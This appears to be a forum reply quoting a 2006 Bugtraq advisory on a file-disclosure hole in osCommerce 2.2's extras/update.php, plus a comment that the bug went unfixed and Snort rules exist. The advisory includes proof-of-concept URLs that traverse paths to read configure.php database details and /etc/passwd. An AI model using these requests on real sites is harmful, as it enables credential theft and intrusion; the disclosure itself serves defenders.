Likes: 
> -----Original Message-----
> From: rgod@autistici.org [mailtogod@autistici.org]=20
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq@securityfocus.com
> Subject: osCommerce "extras/" information/source code disclosure
>=20
>=20
> ---- osCommerce <=3D 2.2 "extras/" information/source code=20
> disclosure ------------
>=20
> software site: http://www.oscommerce.com/
>=20
>=20
> if extras/ folder is placed inside the www path, you can see=20
> all files on target system, including php source code with=20
> database details, poc:
>=20
http://[target]/[path]/extras/update.php?read_me=3D0&readme_file=3D../cat=
alo
g/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=3D0&readme_file=3D/etc/p=
ass
wd
Amazing: this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?
http://sourceforge.net/mailarchive/m..._id=3D12318248
http://www.oscommerce.com/community/bugs,2835
For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.
Quote
